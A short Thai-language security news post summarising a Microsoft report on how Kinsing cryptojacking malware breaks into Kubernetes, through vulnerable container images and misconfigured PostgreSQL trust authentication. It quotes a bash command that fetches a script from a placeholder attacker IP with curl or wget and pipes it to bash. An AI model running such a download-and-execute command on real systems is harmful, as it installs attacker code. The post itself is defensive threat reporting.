Kinsing malware เป็น malware ที่มุ่งเป้าโจมไปที่ Linux environments เพื่อทำการ Cryptojacking โดยทีม Microsoft Defender for Cloud ได้สังเกตเห็นพฤติกรรม Initial access เทคนิคของ Kinsing malware ที่ใช้ในการโจมตี Kubernetes environments ซึ่งหลัก ๆ แบ่งออกได้เป็นสองวิธีดังนี้
วิธีที่ 1 Container Image มีช่องโหว่
Kinsing malware จะพยาม scan หา container ที่มีช่องโหว่ RCE (Remote Code Execution) ที่เคยมีการเปิดเผยต่อสาธารณะแล้ว ตัวอย่าง application ที่เคยโจมตีเช่น:
- PHPUnit
- Liferay
- WebLogic
- WordPress
หลังจากที่ได้ Remote access แล้ว Kinsing จะใช้ shell command เพื่อทำการติดตั้ง malware
“/bin/bash -c (curl -s Attacker_IP/Payload_Name.sh||wget -q -OAttacker_IP/Payload_Name.sh)|bash”
วิธีที่ 2 Misconfiguration PostgreSQL
- trust authentication จากทุก IP address
- Brute force username/password
- ARP poisoning bypass trust authentication private IP
PostgreSQL จะมี config 'trust authentication' ที่สามารถทำ Whitelist IP ได้ว่าจะให้ IP ไหนสามารถ login เข้า Database ได้โดยไม่ต้องใช้ password และเป็น user อะไรก็ได้แม้แต่ superuser ในบางครั้ง IP range ที่ใช้ใน config allow ให้ทุก IP address (เช่น 0.0.0.0/0) จึงทำให้ Kinsing สามารถใช้ช่องโหว่นี้เพื่อเข้าถึง Database ได้
ถ้า trust authentication ไม่ได้มีการ config ไว้ Kinsing จะใช้วิธีการ brute force ไปที่ PostgreSQL แทน หรือถ้า Kinsing สามารถเข้าถึง Network ใน cluster ได้อยู่แล้ว Kinsing จะใช้ ARP poisoning เทคนิคเพื่อ bypass trust authentication ที่ allow เฉพาะ private IP
ที่มา: techcommunity.microsoft
You must be logged in to post a comment.